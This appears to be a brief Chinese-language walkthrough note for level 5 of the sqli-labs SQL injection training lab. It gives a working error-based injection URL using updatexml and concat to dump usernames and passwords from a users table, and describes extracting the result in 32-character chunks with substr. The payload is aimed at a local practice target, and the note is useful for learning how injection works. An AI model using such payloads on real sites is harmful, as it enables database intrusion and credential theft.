第五关
然后修改userLess-5 Double Query- Single Quotes- Stringhttp://localhost/sql/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20group_concat(username,0x3a,password)from%20users),0x7e),1)--+substr截取
在前面截取
注意不要少写括号,不然会报错
1-32之后截取32-64
可以看到还没有截取完,再截取64-96
最后截取192-200发现是已经截取完了